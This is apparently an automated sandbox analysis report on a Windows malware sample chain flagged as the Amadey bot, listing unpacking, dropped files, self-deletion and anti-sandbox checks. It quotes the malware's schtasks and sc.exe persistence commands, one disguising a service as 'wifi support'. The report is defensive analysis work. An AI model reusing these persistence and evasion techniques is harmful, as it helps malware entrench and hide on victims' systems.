                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.772634136.0000000003190000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.771566987.0000000003190000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdbM source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: C:\buti15\juyekuzotaj-yodod\ciso_pematufuz.pdb source: E748.exe, 00000011.00000000.781295267.0000000000401000.00000020.00020000.sdmp, E748.exe, 00000011.00000002.957299537.00000000008A2000.00000004.00000001.sdmp, gecrjwsv.exe, 00000020.00000000.799382925.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.896342042.0000000000C4F000.00000004.00000001.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: -C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdbh source: 5C89.exe, 00000026.00000003.849959984.00000000030D0000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.987438014.0000000003010000.00000040.00000001.sdmp
                          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000F.00000003.772634136.0000000003190000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.771566987.0000000003190000.00000004.00000001.sdmp
                          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9334.exe, 0000000B.00000000.759170928.0000000000413000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767055660.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000F.00000002.803672016.0000000002F80000.00000002.00020000.sdmp
                          Source: Binary string: `C:\buti15\juyekuzotaj-yodod\ciso_pematufuz.pdbh source: E748.exe, 00000011.00000000.781295267.0000000000401000.00000020.00020000.sdmp, E748.exe, 00000011.00000002.957299537.00000000008A2000.00000004.00000001.sdmp, gecrjwsv.exe, 00000020.00000000.799382925.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.896342042.0000000000C4F000.00000004.00000001.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: :]WC:\yakon-nabavazolof\masa.pdb source: 5C89.exe, 00000026.00000002.987710608.0000000003250000.00000040.00000001.sdmp, 5C89.exe, 00000026.00000003.853855551.0000000003300000.00000004.00000001.sdmp
                          Source: Binary string: cfgmgr32.pdbH source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: C:\lalovum36_po.pdb source: tijXCZsbGe.exe, tijXCZsbGe.exe, 00000000.00000000.664586745.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000000.00000002.670247198.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000001.00000000.668244716.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000002.756214332.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000000.750595038.0000000000401000.00000020.00020000.sdmp, rifsswe, 0000000A.00000000.753285521.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: C:\yakon-nabavazolof\masa.pdb source: 5C89.exe, 00000026.00000002.987710608.0000000003250000.00000040.00000001.sdmp, 5C89.exe, 00000026.00000003.853855551.0000000003300000.00000004.00000001.sdmp
                          Source: Binary string: Kernel.Appcore.pdbN source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdbR source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9334.exe, 0000000B.00000000.759170928.0000000000413000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767055660.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000F.00000002.803672016.0000000002F80000.00000002.00020000.sdmp
                          Source: Binary string: C:\lalovum36_po.pdbh source: tijXCZsbGe.exe, 00000000.00000000.664586745.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000000.00000002.670247198.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000001.00000000.668244716.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000002.756214332.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000000.750595038.0000000000401000.00000020.00020000.sdmp, rifsswe, 0000000A.00000000.753285521.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: C:\zazadix dori\kol.pdbh source: DB31.exe, 00000010.00000000.772191492.0000000000401000.00000020.00020000.sdmp

                          Data Obfuscation:

                          Detected unpacking (overwrites its own PE header)
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe Unpacked PE file: 16.2.DB31.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe Unpacked PE file: 17.2.E748.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe Unpacked PE file: 32.2.gecrjwsv.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exe Unpacked PE file: 38.2.5C89.exe.400000.0.unpack
                          Detected unpacking (changes PE section rights)
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe Unpacked PE file: 16.2.DB31.exe.400000.0.unpack .text:ER;.data:W;.gave:W;.noduf:W;.gafal:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe Unpacked PE file: 17.2.E748.exe.400000.0.unpack .text:ER;.data:W;.sop:W;.fob:W;.hasajo:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe Unpacked PE file: 32.2.gecrjwsv.exe.400000.0.unpack .text:ER;.data:W;.sop:W;.fob:W;.hasajo:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exe Unpacked PE file: 38.2.5C89.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: F65C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 18.0.F65C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 18.0.F65C.exe.ab0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 18.0.F65C.exe.ab0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 35.0.F65C.exe.4d0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exe Code function: 0_2_0043E184 push ebp; retf
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exe Code function: 1_2_00401880 push esi; iretd
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exe Code function: 1_2_00402E94 push es; iretd
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exe Code function: 1_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\rifsswe Code function: 9_2_00633634 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\rifsswe Code function: 10_2_00401880 push esi; iretd
                          Source: C:\Users\user\AppData\Roaming\rifsswe Code function: 10_2_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\rifsswe Code function: 10_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe Code function: 11_2_00412CA4 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe Code function: 11_2_0047127E push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe Code function: 11_2_0047123C push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe Code function: 11_2_0047735E push esp; iretd
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe Code function: 11_2_004753C8 pushfd ; retf
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe Code function: 16_2_004139B0 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe Code function: 17_2_00896F0B push 0000002Bh; iretd
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe Code function: 17_2_00894715 push ds; ret
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe Code function: 18_2_00AB8508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe Code function: 18_2_00AB764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe Code function: 18_2_02E54003 push esi; retf
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe Code function: 18_2_02ED0D8C push E86C8B43h; retf
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe Code function: 18_2_054B2503 push E80A995Eh; ret
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exe Code function: 0_2_0042D9F0 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                          Source: F65C.exe.5.dr Static PE information: 0xA22A793F [Sun Mar 19 11:55:43 2056 UTC]
                          Source: tijXCZsbGe.exe Static PE information: section name: .koyalef
                          Source: tijXCZsbGe.exe Static PE information: section name: .bopi
                          Source: tijXCZsbGe.exe Static PE information: section name: .cegem
                          Source: 6FB4.exe.5.dr Static PE information: section name: .gizi
                          Source: 6FB4.exe.5.dr Static PE information: section name: .bur
                          Source: 6FB4.exe.5.dr Static PE information: section name: .wob
                          Source: DB31.exe.5.dr Static PE information: section name: .gave
                          Source: DB31.exe.5.dr Static PE information: section name: .noduf
                          Source: DB31.exe.5.dr Static PE information: section name: .gafal
                          Source: E748.exe.5.dr Static PE information: section name: .sop
                          Source: E748.exe.5.dr Static PE information: section name: .fob
                          Source: E748.exe.5.dr Static PE information: section name: .hasajo
                          Source: 8783.exe.5.dr Static PE information: section name:
                          Source: 8783.exe.5.dr Static PE information: section name:
                          Source: 8783.exe.5.dr Static PE information: section name:
                          Source: 8783.exe.5.dr Static PE information: section name:
                          Source: 8783.exe.5.dr Static PE information: section name:
                          Source: 8783.exe.5.dr Static PE information: section name:
                          Source: 8783.exe.5.dr Static PE information: section name: .28gybOo
                          Source: 8783.exe.5.dr Static PE information: section name: .adata
                          Source: 9DFA.exe.5.dr Static PE information: section name:
                          Source: 9DFA.exe.5.dr Static PE information: section name:
                          Source: 9DFA.exe.5.dr Static PE information: section name:
                          Source: 9DFA.exe.5.dr Static PE information: section name:
                          Source: 9DFA.exe.5.dr Static PE information: section name:
                          Source: 9DFA.exe.5.dr Static PE information: section name:
                          Source: 9DFA.exe.5.dr Static PE information: section name: .28gybOo
                          Source: 9DFA.exe.5.dr Static PE information: section name: .adata
                          Source: C7FA.exe.5.dr Static PE information: section name: .didata
                          Source: rifsswe.5.dr Static PE information: section name: .koyalef
                          Source: rifsswe.5.dr Static PE information: section name: .bopi
                          Source: rifsswe.5.dr Static PE information: section name: .cegem
                          Source: gecrjwsv.exe.17.dr Static PE information: section name: .sop
                          Source: gecrjwsv.exe.17.dr Static PE information: section name: .fob
                          Source: gecrjwsv.exe.17.dr Static PE information: section name: .hasajo
                          Source: initial sample Static PE information: section where entry point is pointing to: .didata
                          Source: 8783.exe.5.dr Static PE information: real checksum: 0x3721bb should be: 0x373654
                          Source: F65C.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x9011f
                          Source: 9DFA.exe.5.dr Static PE information: real checksum: 0x3721bb should be: 0x373654
                          Source: initial sample Static PE information: section name: .text entropy: 6.96511151774
                          Source: initial sample Static PE information: section name: .text entropy: 7.2566886804
                          Source: initial sample Static PE information: section name: .text entropy: 6.98468263043
                          Source: initial sample Static PE information: section name: .text entropy: 6.95999300846
                          Source: initial sample Static PE information: section name: entropy: 7.99714766582
                          Source: initial sample Static PE information: section name: entropy: 7.90784224501
                          Source: initial sample Static PE information: section name: entropy: 7.99361781473
                          Source: initial sample Static PE information: section name: entropy: 7.80912989946
                          Source: initial sample Static PE information: section name: .rsrc entropy: 7.22348700263
                          Source: initial sample Static PE information: section name: .28gybOo entropy: 7.91849564721
                          Source: initial sample Static PE information: section name: entropy: 7.99714766582
                          Source: initial sample Static PE information: section name: entropy: 7.90784224501
                          Source: initial sample Static PE information: section name: entropy: 7.99361781473
                          Source: initial sample Static PE information: section name: entropy: 7.80912989946
                          Source: initial sample Static PE information: section name: .rsrc entropy: 7.22348700263
                          Source: initial sample Static PE information: section name: .28gybOo entropy: 7.91849564721
                          Source: initial sample Static PE information: section name: .didata entropy: 7.99713235918
                          Source: initial sample Static PE information: section name: .text entropy: 6.96511151774
                          Source: initial sample Static PE information: section name: .text entropy: 6.95999300846
                          Source: F65C.exe.5.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: F65C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 18.0.F65C.exe.ab0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 18.0.F65C.exe.ab0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 18.0.F65C.exe.ab0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 18.0.F65C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 18.0.F65C.exe.ab0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 18.0.F65C.exe.ab0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 18.0.F65C.exe.ab0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 18.0.F65C.exe.ab0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 35.0.F65C.exe.4d0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 35.0.F65C.exe.4d0000.13.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 35.0.F65C.exe.4d0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 35.0.F65C.exe.4d0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 35.0.F65C.exe.4d0000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 35.0.F65C.exe.4d0000.7.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

                          Persistence and Installation Behavior:

                          Yara detected Amadey bot
                          Source: Yara match File source: dump.pcap, type: PCAP
                          Source: Yara match File source: 00000029.00000002.953737182.0000000000821000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match File source: 00000029.00000002.953617420.00000000007C3000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match File source: 00000029.00000002.953715192.0000000000812000.00000004.00000001.sdmp, type: MEMORY
                          Drops executables to the windows directory (C:\Windows) and starts them
                          Source: unknown Executable created and started: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\rifsswe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C7FA.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\E748.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\6FB4.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8783.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\B0F7.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\9334.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\9DFA.exe
                          Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe (copy)
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe File created: C:\Users\user\AppData\Local\Temp\gecrjwsv.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\DB31.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\F65C.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5C89.exe

                          Boot Survival:

                          Uses schtasks.exe or at.exe to add and modify task schedules
                          Source: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F
                          Source: C:\Windows\SysWOW64\svchost.exe, Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\xzxafeeu
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe, Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe, Code function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          Hooking and other Techniques for Hiding and Protection:

                          Deletes itself after installation
                          Source: C:\Windows\explorer.exe, File deleted: c:\users\user\desktop\tijxczsbge.exe
                          Hides that the sample has been downloaded from the Internet (zone.identifier)
                          Source: C:\Windows\explorer.exe, File opened: C:\Users\user\AppData\Roaming\rifsswe:Zone.Identifier read attributes | delete
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe, Code function: 16_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                          Source: C:\Windows\System32\svchost.exe, Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe, Process information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe, Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe, Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe, Process information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exe, Process information set: NOGPFAULTERRORBOX

                          Malware Analysis System Evasion:

                          Found evasive API chain (may stop execution after checking mutex)
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe, Evasive API call chain: CreateMutex,DecisionNodes,Sleep
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: tijXCZsbGe.exe, 00000001.00000002.719965671.00000000007DB000.00000004.00000020.sdmp, Binary or memory string: ASWHOOK
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Found evasive API chain (may stop execution after checking locale)
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe, Evasive API call chain: GetUserDefaultLangID, ExitProcess
                          Tries to detect virtualization through RDTSC time measurements
